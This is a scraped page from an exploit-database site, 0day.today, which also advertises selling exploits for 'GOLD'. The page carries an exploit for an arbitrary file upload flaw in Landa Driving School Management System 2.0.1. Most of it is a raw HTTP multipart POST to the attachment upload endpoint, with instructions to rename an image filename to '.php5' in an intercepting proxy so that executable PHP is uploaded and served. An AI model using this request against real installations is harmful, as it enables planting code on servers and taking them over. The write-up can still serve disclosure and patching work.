0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

Landa Driving School Management System 2.0.1 Arbitrary File Upload Vulnerability

Author

Sohel Yousef

Risk

[

Security Risk High

]

0day-ID

Category

Date add

Platform

# Exploit Title: Landa Driving School Management System Arbitrary File Upload
# Version 2.0.1
# Exploit Author: Sohel Yousef - sohel.yousef@yandex.com
# Software Link: https://codecanyon.net/item/landa-driving-school-management-system/23220151
# Software link 2 :https://simcycreative.com/landa/
# Software Demo : https://landa.simcycreative.com/
# Category: webapps

Landa Driving School Management System contain arbitrary file upload
registered user can upload .php5 files in attachments section with use of intercept tool in burbsuite to edit the raw

details 

POST /profile/attachment/upload/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: */*
Accept-Language: ar,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------215084716322124620333137564048
Content-Length: 294983
Origin: https://localhost 
Connection: close
Referer: https://localhost/profile/91/
Cookie: CSRF-TOKEN=e9055e0cf3dbcbf383f7fdf46d418840fd395995ced9f3e1756bd9101edf0fcf; simcify=97a4436a6f7c5c5cd1fc43b903e3b760
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------215084716322124620333137564048
Content-Disposition: form-data; name="name"

sddd
-----------------------------215084716322124620333137564048
Content-Disposition: form-data; name="csrf-token"

e9055e0cf3dbcbf383f7fdf46d418840fd395995ced9f3e1756bd9101edf0fcf
-----------------------------215084716322124620333137564048
Content-Disposition: form-data; name="userid"

91
-----------------------------215084716322124620333137564048
Content-Disposition: form-data; name="attachment"; filename="w.php.png" >>>>>>>>>>>>>>>>  change this to w.php5
Content-Type: image/png


you will have a direct link to the uploaded files

#  0day.today [2024-11-16]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

Landa Driving School Management System 2.0.1 Arbitrary File Upload Vulnerability

Report Error

Report Error